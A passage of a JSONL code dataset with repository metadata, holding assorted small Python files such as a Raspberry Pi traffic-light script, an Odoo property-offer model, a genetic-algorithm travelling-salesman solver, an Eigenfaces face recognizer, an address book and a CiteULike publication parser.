#根据不同的item,构建不同的sql语句,并且插入到mysql中\n #plan1 if item.__class__.__name__ ==\"ArticleItem\" (通过item的名字来区别sql语句的写入)\n #plan 2 见items\n insert_sql,params = item.get_sql()\n cursor.execute(insert_sql,params)\n","repo_name":"kilort/zhihu","sub_path":"zhihu/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74066451048","text":"import RPi.GPIO as GPIO\nfrom time import sleep\nfrom functools import partial\nimport lights_config as config\n\nGPIO.setmode(GPIO.BCM)\n\nGPIO.setup(config.button, GPIO.IN)\n\ndef createLight(pin):\n GPIO.setup(pin, GPIO.OUT)\n return partial(GPIO.output, pin)\n\ndef trackChange(init):\n value = [init]\n def changed(newValue):\n if (newValue == value[0]):\n return False\n value[0] = newValue\n return True\n\n return changed\n\ndef blink(light, time):\n while (time > 0):\n light(1)\n sleep(0.3)\n light(0)\n sleep(0.3)\n time -= 0.6\n\nbtnState = trackChange(GPIO.input(config.button))\nred = createLight(config.red)\nyellow = createLight(config.yellow)\ngreen = createLight(config.green)\nblue = createLight(config.blue)\n\ngreen(1)\n\ntry:\n while True:\n state = GPIO.input(config.button)\n change = btnState(state)\n if change == True:\n if state == True:\n green(0)\n yellow(1)\n sleep(0.6)\n yellow(0)\n red(1)\n blink(blue, 6)\n yellow(1)\n sleep(0.6)\n red(0)\n yellow(0)\n green(1)\n else:\n green(1)\nexcept KeyboardInterrupt:\n GPIO.cleanup()\n","repo_name":"fonzerelly/RaspberryPi_Experiments","sub_path":"lights/04_traffic_lights_on_button.py","file_name":"04_traffic_lights_on_button.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38990814259","text":"import streamlit, UTILS, PIL, numpy\nimport streamlit.components.v1 as components\n\n\ndef populate_tracks(tracks: list) -> None:\n tag = \"

    Top Tracks

    \"\n streamlit.markdown(tag, unsafe_allow_html=True)\n with streamlit.container():\n col1, col2, col3 = streamlit.columns([3, 3, 3])\n for i, track in enumerate(tracks):\n if i % 3 == 0:\n with col1:\n components.html(frame.format(track), height=400)\n elif i % 3 == 1:\n with col2:\n components.html(frame.format(track), height=400)\n else:\n with col3:\n components.html(frame.format(track), height=400)\n\n\ndef populate_emotion(emotion: str) -> None:\n left_color = UTILS.constants[\"colors\"][\"left\"]\n left_span = 'Identified Emotion: '\n left_span = left_span.format(left_color)\n\n emotion_color = UTILS.constants[\"colors\"][emotion]\n right_span = '{}'\n right_span = right_span.format(emotion_color, emotion.capitalize())\n\n tag = \"

    {}

    \"\n tag = tag.format(left_span + right_span)\n streamlit.markdown(tag, unsafe_allow_html=True)\n\n\nif __name__ == \"__main__\":\n tracks = UTILS.tracks\n frame = UTILS.constants[\"frame\"]\n picture = streamlit.camera_input(\"\")\n if picture is not None:\n picture = PIL.Image.open(picture)\n pixels = numpy.array(picture)\n emotion = UTILS.detect_emotion(pixels)\n if emotion:\n tracks = UTILS.get_top_k(emotion)\n populate_emotion(emotion)\n populate_tracks(tracks)\n else:\n tag = (\n '

    No face detected

    '\n )\n streamlit.markdown(tag, unsafe_allow_html=True)\n","repo_name":"ChitturiSaiSuman/Emotion-Aware-Music-Recommendation-System","sub_path":"App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"39929403636","text":"# -*- coding: utf-8 -*-\n\n# odoo imports\nfrom odoo import models\nfrom odoo import fields\nfrom odoo import api\nfrom odoo import exceptions\n\n# others imports\nimport datetime\n\n\nclass HouseLocationOffer(models.Model):\n _name = 'house.location.offer'\n _description = 'Property Offer'\n\n price = fields.Float(string=\"Price\", default=0, required=True, help=\"\",)\n\n status = fields.Selection(\n string=\"Status\",\n selection=[\n (\"accepted\", \"Accepted\"),\n (\"refused\", \"Refused\"),\n ],\n readonly=True,\n copy=False,\n )\n\n # who is a offer owner?\n partner_id = fields.Many2one(\n \"res.partner\", required=True, string=\"Partner\", help=\"\",)\n\n # virtual link with 'house.location' model\n property_id = fields.Many2one(\n \"house.location\", string=\"Property\", readonly=True, help=\"\",)\n\n # warning : is only filled in when the record is created, therefore you will need a fallback to prevent crashing at time of creation.\n create_date = fields.Date(string=\"Create Date\", copy=False,\n default=lambda *args: fields.Date.today(), readonly=True, help=\"\")\n validity = fields.Integer(string=\"Validity (days)\")\n date_deadline = fields.Date(\n string=\"Deadline\", compute=\"_compute_offer_deadline\", inverse=\"_inverse_offer_deadline\")\n\n # crud\n @api.model\n def create(self, vals):\n \"\"\"create new offer\n\n Args:\n vals (dict): offer properties values\n\n Raises:\n exceptions.ValidationError: an other offer with this vals['price'] already exists\n\n Returns:\n HouseLocationOffer: a new instance of HouseLocationOffer\n \"\"\"\n\n # warning : faire un filtre composite, les offres relatives a une seule maison\n\n offers_count = self.env['house.location.offer'].search(\n [('price', '=', vals['price'])], count=True,)\n\n if (offers_count > 0):\n raise exceptions.ValidationError(\n f\"[NEW OFFER ERROR] Property have already received this offer \\n {vals}\")\n\n else:\n return super(HouseLocationOffer, self).create(vals)\n\n # constrains\n @api.constrains('price')\n def _check_price(self):\n \"\"\"check price constraint\n\n Raises:\n exceptions.ValidationError: negative value or existing offer\n \"\"\"\n\n for record in self:\n offers_count = self.env['house.location.offer'].search(\n [('price', '=', record.price)], count=True,)\n\n if (record.price < 0):\n raise exceptions.ValidationError(\n f\"[OFFER ID : {record.id}] Price must be positive\")\n\n elif (offers_count > 1):\n raise exceptions.ValidationError(\n f\"[OFFER ID : {record.id}] An offer with this price already exist\")\n\n @api.constrains('validity')\n def _check_validity(self):\n \"\"\"check validity constraint\n\n Raises:\n exceptions.ValidationError: negative value\n \"\"\"\n\n for record in self:\n if (record.validity < 0):\n raise exceptions.ValidationError(\n f\"[OFFER ID : {record.id}] validity must be positive\")\n\n @api.constrains('date_deadline')\n def _check_date_deadline(self):\n \"\"\"check validity constraint\n\n Raises:\n exceptions.ValidationError: date deadline < create date\n \"\"\"\n\n for record in self:\n if (record.date_deadline < record.create_date):\n raise exceptions.ValidationError(\n f\"[OFFER ID : {record.id}] date deadline must be greater than create date\")\n\n # compute\n @api.depends('validity')\n def _compute_offer_deadline(self):\n \"\"\"compute deadline when validity value change\n \"\"\"\n\n for record in self:\n record.date_deadline = record.create_date + \\\n datetime.timedelta(days=record.validity)\n\n def _inverse_offer_deadline(self):\n \"\"\"compute validity when date_deadline value change\n \"\"\"\n\n for record in self:\n time_delta = record.date_deadline - record.create_date\n\n record.validity = time_delta.days\n\n # buttons actions\n\n def accept_offer(self):\n \"\"\"check offer acceptability and set offer status to 'accepted' if not other accepted offer\n\n Raises:\n exceptions.ValidationError: an other accepted offer already exists \n \"\"\"\n\n # check existing accepted offer\n best_offer = 0.0\n\n for record in self:\n if record.property_id.state == 'offer accepted': # il y a deja une offre accepted\n raise exceptions.UserError(\n f\"[OFFER ID : {record.id}] Property have already an accepted offer\")\n\n else:\n # house_location.state = 'offer accepted'\n record.status = \"accepted\"\n record.property_id.state = 'offer accepted'\n record.property_id.selling_price = record.price\n record.property_id.buyer = record.partner_id\n\n # update best offer\n if record.price > best_offer:\n best_offer = record.price\n record.property_id.best_price = record.price\n\n def refuse_offer(self):\n \"\"\"refuse an offer and set offer status to 'refused'\n \"\"\"\n\n best_offer = 0.0\n\n for record in self:\n if record.status == 'accepted': # c'etait une offre accepted\n record.property_id.state = 'offer received'\n record.property_id.selling_price = None\n record.property_id.buyer = None\n\n else:\n # house_location.state = 'offer accepted'\n pass\n\n # refuse offer\n record.status = \"refused\"\n\n # update best offer\n if record.price > best_offer:\n best_offer = record.price\n record.property_id.best_price = record.price\n","repo_name":"nathanbangwa243/odoo-addons","sub_path":"addons/house_location/models/house_location_offer.py","file_name":"house_location_offer.py","file_ext":"py","file_size_in_byte":6033,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70227640487","text":"# -*— codeing = utf-8 -*—\n# @Time : 2021/10/2012:41 上午\n# @Author : 房淡淡\n# @File : urls.py\n# @Software : PyCharm\nfrom django.urls import path,converters\nfrom django.urls.converters import register_converter\nfrom book.views import index,create,shop,register,json,set_cookie,get_cookie,set_session,get_session\nfrom book.views import LoginView,OrderView\n#1.重写转换器\nclass mobileConverter:\n regex = '1[3-9]\\d{9}'\n\n def to_python(self, value):\n return value\n\n def to_url(self, value):\n return value\n#注册转换器\nregister_converter(mobileConverter,\"mobile\")\n\nurlpatterns = [\n path('index/', index),\n path('create/',create),\n path('register/', register),\n path('json/',json),\n #使用转换器,系统自带的和重写的\n path('//',shop),\n path('set_cookie/',set_cookie),\n path('get_cookie/',get_cookie),\n path('set_session/',set_session),\n path('get_session/',get_session),\n path('login/',LoginView.as_view()),\n path('order/',OrderView.as_view()),\n]","repo_name":"fangyaxin555/Django_lianxi","sub_path":"bookmanger03/book/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34351753194","text":"import math\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cvxpy as cp\nimport csv\nimport imageio\n\nfrom scipy.stats import norm\n\n# mu = 0\n# sigma = 1\n# x = np.linspace(-3, 3, 100)\n# y = np.exp(-(x - mu) ** 2 / 2 * sigma ** 2) / sigma * np.sqrt(2 * math.pi)\n# plt.figure()\n# plt.plot(x, y, \"r-\", linewidth=2)\n# plt.savefig(\"screenshot/1.png\", transparent=True, pad_inches=0)\n\nx = np.random.normal(0, 1, 1000)\nmu, sigma = norm.fit(x)\nprint(mu, sigma)\nplt.figure()\nplt.subplot(211)\na = plt.hist(x, 4, density=True)\nplt.plot(a[1], norm.pdf(a[1]), \"r\")\nplt.subplot(212)\nb = plt.hist(x, 1000, density=True)\nplt.plot(b[1], norm.pdf(b[1]), \"r\")\nplt.savefig(\"screenshot/2.png\", transparent=True, pad_inches=0)\n\nx = np.random.normal(0, 1, 1000)\nx.sort()\nd = x.max() - x.min()\nj_h = 0\nlabel = 0\nj_ha = np.zeros(200)\nfor m in range(1, 201):\n hist, bins = np.histogram(x, m)\n h = d / m\n s = 0\n for item in hist:\n s += (item / 1000) ** 2\n temp = 2 / (h * 999) - s * 1001 / (h * 999)\n if m == 0:\n j_h = temp\n elif temp < j_h:\n label = m\n j_h = temp\n j_ha[m - 1] = j_h\n\nprint(label)\nplt.figure()\np = plt.hist(x, label, density=True)\nplt.plot(p[1], norm.pdf(p[1]), \"r\")\nplt.savefig(\"screenshot/3.png\", transparent=True, pad_inches=0)\n\nplt.figure()\nstep = np.linspace(1, 200, 200)\nplt.plot(step, j_ha)\nplt.savefig(\"screenshot/jha.png\", transparent=True, pad_inches=0)\nplt.show()\n","repo_name":"MoonOoOoO/ECE595","sub_path":"HW1/HW1_EX2.py","file_name":"HW1_EX2.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29370524282","text":"class Friends:\n def __init__(self, stupidlevel, howdumb, howfar, howbuddha, name):\n self.st = stupidlevel\n self.hd = howdumb\n self.hf = howfar\n self.hb = howbuddha\n self.name = name\n\n def SayHi(self):\n print(f\"Hi, {self.name}\")\n\nswayam = Friends(6, 11, 8, 14, \"Swayam\")\nswayam.SayHi()\nprint(swayam.hb)","repo_name":"JohnJoseph2007/python","sub_path":"Python/classexample.py","file_name":"classexample.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71807569448","text":"# travelling salesman problem using genetic algorithm\r\n\r\n\r\nfrom random import randrange\r\n\r\nstart=1\r\nn=1\r\ndis=[[]]\r\n\r\n\r\ndef population(size):\r\n assert size<=__import__('math').factorial(n)\r\n p=set()\r\n while len(p)j: i,j=j,i\r\n c=[0]*len(x)\r\n b=[False]*n\r\n for k in range(i,j+1):\r\n c[k]=y[k]\r\n b[y[k]]=True\r\n ix=0\r\n for z in ((0,i),(j+1,n)):\r\n for k in range(*z):\r\n while b[x[ix]]: ix+=1\r\n b[x[ix]]=True\r\n c[k]=x[ix]\r\n c[-1]=start\r\n return c\r\n\r\ndef mutate(x):\r\n i,j=randrange(1,n),randrange(1,n)\r\n x[i],x[j] = x[j],x[i]\r\n\r\ndef selection(population,fitness,_top=33):\r\n i=randrange(len(fitness)//3)\r\n return (sorted(zip(fitness,population))[i])[1] # top 33% default\r\n\r\ndef genetic_algo(popu,max_iter=10000):\r\n fit=fitness(popu)\r\n from tqdm import tqdm\r\n for _ in tqdm(range(max_iter)):\r\n next_gen=[]\r\n for j in range(len(popu)):\r\n x=selection(popu,fit)\r\n y=selection(popu,fit)\r\n child=crossover(x,y)\r\n if randrange(10101)%3==0:\r\n mutate(child)\r\n next_gen.append(child)\r\n popu=next_gen\r\n fit=fitness(popu)\r\n return sorted(popu,key=score)[0]\r\n\r\n\r\ndef main():\r\n random_graph(1)\r\n p=population(300)\r\n x=genetic_algo(p,1000)\r\n print(x)\r\n print(score(x))\r\n\r\n\r\ndef random_graph(show=False):\r\n global n,dis,start\r\n n=randrange(15,100)\r\n start=randrange(n)\r\n dis=[[0]*n for i in range(n)]\r\n for i in range(n):\r\n for j in range(i+1,n):\r\n dis[i][j]=dis[j][i]=randrange(1,51)\r\n if show:\r\n print(n)\r\n print(start)\r\n for i in range(n):\r\n for j in range(i+1,n):\r\n print(i,j,dis[i][j])\r\n # print(f'{i} -> {j} : {dis[i][j]}')\r\n\r\n\r\n\r\nmain()\r\n","repo_name":"fnvir/ml","sub_path":"ml/z/tsp_genetic.py","file_name":"tsp_genetic.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70865383529","text":"import cv2\r\nimport os\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport time\r\n\r\ndataset_path = os.listdir(\r\n \"PATH_TO_FOLDERS_OF_FACE_IMAGES\")\r\ntest_data = \"PATH_TO_TEST_FACE_IMAGES\"\r\npersons = []\r\nprec = []\r\ntraining_start = time.time()\r\n\r\nfor count, dir_name in enumerate(dataset_path, start=1):\r\n person_map = {\"id\": count, \"name\": dir_name}\r\n persons.append(person_map)\r\n\r\n\r\ndef detect_face(image):\r\n grayscale = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n face_cascade = cv2.CascadeClassifier(\r\n \"haarcascade_frontalface_default.xml\")\r\n detected_face = face_cascade.detectMultiScale(\r\n grayscale, scaleFactor=1.1, minNeighbors=7)\r\n\r\n if(len(detected_face) == 0):\r\n return None, None\r\n x, y, w, h = detected_face[0]\r\n return grayscale[y:y+w, x:x+h], detected_face[0]\r\n\r\n\r\ndef prep_training_data(path_to_data):\r\n directories = os.listdir(path_to_data)\r\n faces = []\r\n labels = []\r\n label = 0\r\n for directory in directories:\r\n label_id = [i['id'] for i in persons if i['name'] == directory]\r\n label = int(label_id[0])\r\n person_dir = path_to_data + \"/\" + directory\r\n person_images = os.listdir(person_dir)\r\n\r\n for n_image in person_images:\r\n if n_image.startswith(\".\"):\r\n continue\r\n path_of_image = person_dir + \"/\" + n_image\r\n image = cv2.imread(path_of_image)\r\n img = cv2.resize(image, (250, 250))\r\n\r\n face, bounding_box = detect_face(img)\r\n if face is not None:\r\n face = cv2.resize(face, (100, 100))\r\n faces.append(face)\r\n labels.append(label)\r\n return faces, labels\r\n\r\n\r\nfaces, labels = prep_training_data(dataset_path)\r\neigenfaces_face_recognition = cv2.face.EigenFaceRecognizer_create()\r\neigenfaces_face_recognition.train(faces, np.array(labels))\r\n\r\ntraining_end = time.time()\r\n\r\n\r\ndef draw_rect(img, rect):\r\n (x, y, w, h) = rect\r\n cv2.rectangle(img, (x, y), (x+w, y+h), (236, 110, 173), 2)\r\n\r\n\r\ndef draw_text(img, text, x, y):\r\n cv2.putText(img, text, (x, y), cv2.FONT_HERSHEY_DUPLEX,\r\n 0.7, (52, 148, 230), 2)\r\n\r\n\r\ndef predict(face_image):\r\n prediction_start = time.time()\r\n img = face_image.copy()\r\n face, rect = detect_face(img)\r\n face = cv2.resize(face, (100, 100))\r\n label, distance = eigenfaces_face_recognition.predict(face)\r\n print(f\"RECOGNIZED LABEL {label} with {round(distance, 2)}%\")\r\n get_from_dict = [i['name'] for i in persons if i['id'] == label]\r\n person = str(get_from_dict[0])\r\n draw_rect(img, rect)\r\n draw_text(img, person, rect[0], rect[1]-5)\r\n prediction_end = time.time()\r\n print(f\"Predicted in {prediction_end - prediction_start} s \")\r\n prec.append(str(prediction_end - prediction_start) + \"\\n\")\r\n return img\r\n\r\n\r\ndef test_faces(path_to_test_data):\r\n images = os.listdir(path_to_test_data)\r\n for image in images:\r\n path_of_test_img = path_to_test_data + \"/\" + image\r\n print(image)\r\n if image.startswith(\".\"):\r\n continue\r\n img = cv2.imread(path_of_test_img)\r\n print(f\"Test data shape: {img.shape}\")\r\n prediction = predict(img)\r\n cv2.imshow(image, prediction)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\n\r\n\r\nprint(f\"Trained in: {training_end - training_start}\")\r\nprint(\"Starting...\")\r\n\r\ntest_faces(test_data)\r\n","repo_name":"tomzs/face-recogniton","sub_path":"eigenfaces.py","file_name":"eigenfaces.py","file_ext":"py","file_size_in_byte":3413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25547367163","text":"import calendar\nfrom collections import UserDict\nfrom datetime import datetime\nfrom itertools import islice\nimport csv\n\nclass Field:\n def __init__(self, value: str):\n self._value = None\n self.value = value\n\n def __str__(self) -> str:\n return f\"{self._value}\"\n\n def __repr__(self) -> str:\n return f\"{self._value}\"\n\nclass Birthday(Field):\n \n @property\n def value(self) -> datetime.date:\n return self._value\n\n @value.setter\n def value(self, value):\n\n if value is None:\n return f\"You don't add birthday\"\n\n try: \n self._value = datetime.strptime(value, \"%d-%m-%Y\").date()\n except ValueError:\n print(f\"Entered {value} is not correct date. Please use format: 'dd-mm-yyyy'\")\n\n def __repr__(self) -> str:\n return datetime.strftime(self._value, \"%d-%m-%Y\")\n \nclass Name(Field):\n @property\n def value(self):\n return self._value\n \n @value.setter\n def value(self, value):\n self._value = value\n\n\nclass Phone(Field):\n\n @property\n def value(self):\n return self._value\n \n @value.setter\n def value(self, value):\n phone_number = (value.strip()\n .removeprefix(\"+\")\n .replace(\"-\", \"\")\n .replace(\" \", \"\"))\n \n if not (phone_number.isdigit() \n and phone_number.startswith(\"380\") \n and len(phone_number) == 12):\n raise ValueError\n self._value = phone_number\n\n\nclass Record:\n def __init__(self, name: Name, phones: list[Phone] = [], birthday: Birthday = None):\n self.name = name\n self.phones = phones\n self.birthday = birthday\n\n\n def add_phone_field(self, phone_number: Phone):\n self.phones.append(phone_number)\n \n \n def delete_phone_field(self, phone_number: Phone):\n for i in self.phones:\n if i.value == phone_number.value:\n self.phones.remove(i)\n return f'Phone {i.value} delete successful.'\n return f'Phone {phone_number.value} not found'\n\n\n def change_phone_field(self, old_number: Phone, new_number: Phone):\n for i, p in enumerate(self.phones):\n if p.value == old_number.value:\n self.phones[i] = new_number\n return f\"Phone {old_number.value} changed on {new_number.value}\"\n return f\"Contact does not contain such phone number: {old_number}\"\n \n# check enter data from user\n def match_param(self, param):\n if str(param).lower() in str(self.name.value).lower():\n return True\n \n for phone in self.phones:\n if param in phone.value:\n return True\n return False\n\n\n def add_birthday_field(self, birthday: Birthday):\n self.birthday = birthday\n\n\n def days_to_birthday(self):\n current_date = datetime.now()\n\n if self.birthday is not None:\n birthday: datetime.date = self.birthday.value.date()\n \n next_birthday = datetime(\n year=current_date.year, \n month=birthday.month, \n day=birthday.day\n ).date()\n\n if next_birthday < current_date:\n next_birthday = datetime(\n year=next_birthday.year + 1,\n month=next_birthday.month,\n day=next_birthday.day\n )\n return (next_birthday - current_date).days\n return None\n \n def __str__(self) -> str:\n return f\"Name {self.name} phones: {';'.join([str(p) for p in self.phones])} {str(self.birthday) if self.birthday else ''}\"\n \nclass AddressBook(UserDict):\n index = 0 # add for hw 11\n filename = \"contacts_book.csv\"\n\n def add_record(self, rec: Record):\n self.data[rec.name.value] = rec\n \n def show_all(self):\n return '\\n'.join([f'{r.name.value} : {\",\".join([str(p) for p in r.phones])}' for r in self.data.values()])\n\n def iteration(self, step=5):\n while AddressBook.index < len(self):\n yield list(islice(self.items(), AddressBook.index, AddressBook.index+step))\n if AddressBook.IndentationError > len(self):\n raise StopIteration()\n AddressBook.index += step\n\n def open_file(self):\n with open(self.filename, \"r\") as file:\n reader = csv.DictReader(file, delimiter=',')\n for row in reader:\n self.add_record(Record(Name(row['name']),\n [Phone(p) for p in row['phones'].split(';')],\n Birthday(row['birthday']) if row['birthday'] != 'None' else None))\n\n def save_to_file(self):\n with open(self.filename, 'w', newline='') as file:\n header_names = ['name', 'phones', 'birthday']\n writer = csv.DictWriter(file, fieldnames=header_names, delimiter=',')\n writer.writeheader()\n for rec in self.data.values():\n writer.writerow({'name': str(rec.name), \n 'phones': ';'.join([str(p) for p in rec.phones]), \n 'birthday': str(rec.birthday)})\n\n # def search(self, name, phone):\n # try:\n # return self.data[str(name).lower().capitalize(), phone]\n \n # except KeyError:\n # return \"Name not found\"\n\n def search(self, param):\n contacts = []\n for record in self.data.values():\n if record.match_param(param):\n contacts.append(record)\n return contacts\n \n\n\n \n \n \n \n \n \n\n","repo_name":"DenysPhV/HW-12-Serialized","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":5720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27627700077","text":"def trivial_algorithm(prefix_length, string, index):\n while index + prefix_length < len(string) and string[prefix_length] == string[index + prefix_length]:\n prefix_length += 1\n return prefix_length\n\n\ndef get_z_function(string: str) -> list:\n z_array = []\n for index, symbol in enumerate(string):\n z_array.append(0)\n if index == 0:\n continue\n while index + z_array[index] < len(string) and string[z_array[index]] == string[index + z_array[index]]:\n z_array[index] += 1\n return z_array\n\n\ndef get_z_function_effectively(string: str) -> list:\n z_array = []\n rightmost_found_prefix_index = 0\n leftmost_found_prefix_index = 0\n for index, symbol in enumerate(string):\n if index == 0:\n z_array.append(0)\n continue\n if index > rightmost_found_prefix_index:\n prefix_length = 0\n else:\n prefix_length = min(\n z_array[index - leftmost_found_prefix_index],\n rightmost_found_prefix_index - index + 1\n )\n while index + prefix_length < len(string) and string[prefix_length] == string[index + prefix_length]:\n prefix_length += 1\n z_array.append(prefix_length)\n prefix_end_index = index + prefix_length - 1\n if prefix_end_index > rightmost_found_prefix_index:\n leftmost_found_prefix_index = index\n rightmost_found_prefix_index = prefix_end_index\n return z_array\n\n\nif __name__ == '__main__':\n string = 'aaaaa'\n print(get_z_function(string))\n string = 'abaaba'\n print(get_z_function(string))\n string = 'aaabaab'\n print(get_z_function(string))\n string = 'abacaba'\n print(get_z_function(string))\n\n print()\n\n string = 'aaaaa'\n print(get_z_function_effectively(string))\n string = 'abaaba'\n print(get_z_function_effectively(string))\n string = 'abaabaaba'\n print(get_z_function_effectively(string))\n string = 'aabaab'\n print(get_z_function_effectively(string))\n string = 'abacabacabacabac'\n print(get_z_function_effectively(string))\n string = 'abcdefg_abcdefg1_abcdefg_abcdefg1_abcdefg_abcdefg1_abcdefg_abcdefg1_'\n print(get_z_function_effectively(string))\n string = 'abacaba'\n print(get_z_function_effectively(string))\n","repo_name":"AndreyAD1/mipt_course","sub_path":"lesson_13_stack/ex_1_z_function.py","file_name":"ex_1_z_function.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26898798845","text":"import time\n\nfrom fate_arch.common.log import getLogger\n\nLOGGER = getLogger()\n\n\ndef nretry(func):\n \"\"\"retry connection\n \"\"\"\n\n def wrapper(self, *args, **kwargs):\n \"\"\"wrapper\n \"\"\"\n res = None\n exception = None\n for ntry in range(10):\n try:\n res = func(self, *args, **kwargs)\n exception = None\n break\n except Exception as e:\n LOGGER.error(\"function %s error\" % func.__name__, exc_info=True)\n exception = e\n time.sleep(1)\n\n if exception is not None:\n LOGGER.debug(\n f\"failed\",\n exc_info=exception)\n raise exception\n\n return res\n\n return wrapper\n","repo_name":"FederatedAI/FATE","sub_path":"python/fate_arch/federation/_nretry.py","file_name":"_nretry.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":5296,"dataset":"github-code","pt":"53"} +{"seq_id":"40930288121","text":"# Package Imports\nimport os\nfrom flask import Flask, render_template\n\n# Local Imports\nfrom sliceofpy.components.database import initialize_tables as init_tables\n\n\ndef create_app(test_config=None):\n\n app = Flask(__name__)\n app.config.from_mapping(\n SECRET_KEY='dev'\n )\n\n if test_config is None:\n app.config.from_pyfile('config.py', silent=True)\n else:\n app.config.from_mapping(test_config)\n\n try:\n os.makedirs(app.instance_path)\n except OSError:\n pass\n\n @app.route('/')\n @app.route('/index')\n def index():\n init_tables()\n return render_template('index.html', title='SliceOfPy - Index')\n\n return app\n","repo_name":"gurgy11/SliceOfPy","sub_path":"sliceofpy/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12711792652","text":"#!/usr/local/bin/python3\n\"\"\"CiteULike Publication objects.\n\nDefines publications from CiteULike service.\n\nThis code is not highly maintained!!!!\n\"\"\"\n\nimport json\nimport sys\nimport urllib.parse\n\nimport publication\n\n\nSERVICE_NAME = \"CiteULike\"\n\n# CUL URLs\n#\n# User library\n# http://www.citeulike.org/user/galaxyproject\n# Group Library\n# http://www.citeulike.org/group/16008/library\n# Particular tag in a user library\n# http://www.citeulike.org/user/galaxyproject/tag/methods\n# Particular tag in a group library\n# http://www.citeulike.org/group/16008/tag/methods\n# AND search in a user library\n# http://www.citeulike.org/search/username?q=tag%3Amethods+%26%26+year%3A2017&search=Search+library&username=galaxyproject\n# AND search in a group library\n# http://www.citeulike.org/search/group?q=tag%3Amethods+%26%26+year%3A2017&search=Search+library&group_id=16008\n\n# Group library in JSON format\n# http://www.citeulike.org/json/group/16008\n\nCUL_BASE_URL = \"http://www.citeulike.org\"\n\nCUL_SEARCH_LOGICAL_AND = \"+%26%26+\" # \" && \"\nCUL_SEARCH_YEAR = \"year%3A\" # \"year:\"\nCUL_SEARCH_TAG = \"tag%3A\" # \"tag:\"\n\n# append after user or group to get all papers with a tag.\nCUL_TAG_SUFFIX = \"/tag/\"\n\n\nclass Pub(publication.Pub):\n \"\"\"A publication defined in a CiteULike library.\n\n Initially (and probably forever) the original definition of CUL pubs\n comes from a CUL JSON export of the whole library.\n \"\"\"\n def __init__(self, cul_json):\n \"\"\"Create a CiteULike publication object from CUL JSON.\"\"\"\n\n super(Pub, self).__init__()\n\n self._cul_json = cul_json\n self.title = self._cul_json[\"title\"]\n self.canonical_title = publication.to_canonical(self.title)\n self.cul_id = self._cul_json[\"article_id\"]\n doi = self._cul_json.get(\"doi\")\n if doi:\n doi = publication.to_canonical_doi(doi)\n self.canonical_doi = doi\n self.url = self._cul_json[\"href\"]\n\n # TODO: Type may not be the most useful. It's \"JOUR\" for\n # Journal Article and \"THES\" for thesis. May not map to BibTeX.\n self.pub_type = self._cul_json.get(\"type\")\n\n # Authors is a list of \"First I. Last\"\n author_list = self._cul_json.get(\"authors\")\n if author_list:\n authors = \", \".join(author_list)\n self.set_authors(\n authors,\n self.to_canonical_first_author(author_list[0]))\n else:\n print(\"Warning: CUL Pub '{0}'\".format(self.title), file=sys.stderr)\n print(\" Does not have any authors.\\n\", file=sys.stderr)\n\n published = self._cul_json.get(\"published\")\n if published:\n self.year = published[0]\n else:\n self.year = \"unknown\"\n self.tags = self._cul_json[\"tags\"] # a list\n journal = self._cul_json.get(\"journal\")\n if journal:\n self.canonical_journal = publication.to_canonical(journal)\n else:\n self.canonical_journal = None\n\n # Entry date in CUL JSON looks like \"date\": \"2016-12-22 00:18:58\"\n self.entry_date = self._cul_json.get(\"date\")[0:10]\n\n return None\n\n def to_canonical_first_author(self, cul_author_string):\n \"\"\"Convert a CUL author name to a canonical first author name.\n\n CUL Author name is\n First M. Last\n\n Canonical first author is last name of first author.\n \"\"\"\n if cul_author_string:\n by_dots = cul_author_string[0].split(\".\")\n if len(by_dots) > 1:\n # Last name is what follows the last period,\n first_author = by_dots[-1]\n else:\n # or if there is no period, then what follows the last space.\n first_author = cul_author_string.split()[-1]\n canonical_first_author = publication.to_canonical(first_author)\n else:\n canonical_first_author = None\n return canonical_first_author\n\n\nclass PubLibrary(publication.PubLibrary):\n \"\"\"A collection of publications from CiteULike.\"\"\"\n\n def __init__(self, cul_json_lib_path, cul_lib_url):\n \"\"\"Given a file containing a CiteULike JSON export of a library,\n create a publication library containing all the pubs in that library.\n \"\"\"\n super(PubLibrary, self).__init__()\n\n self.url = cul_lib_url\n # URL tell us if user or group library.\n self.is_user_lib = False\n self.is_group_lib = False\n url_parts = urllib.parse.urlparse(self.url)\n if url_parts.path.startswith(\"/user/\"): # \"/user/galaxyproject\n self.is_user_lib = True\n self._cul_username = url_parts.path.split(\"/\")[2]\n elif url_parts.path.startswith(\"/group/\"): # \"/group/16008/library\"\n self.is_group_lib = True\n self._cul_group_id = url_parts.path.split(\"/\")[2]\n else:\n raise ValueError(\n \"Library 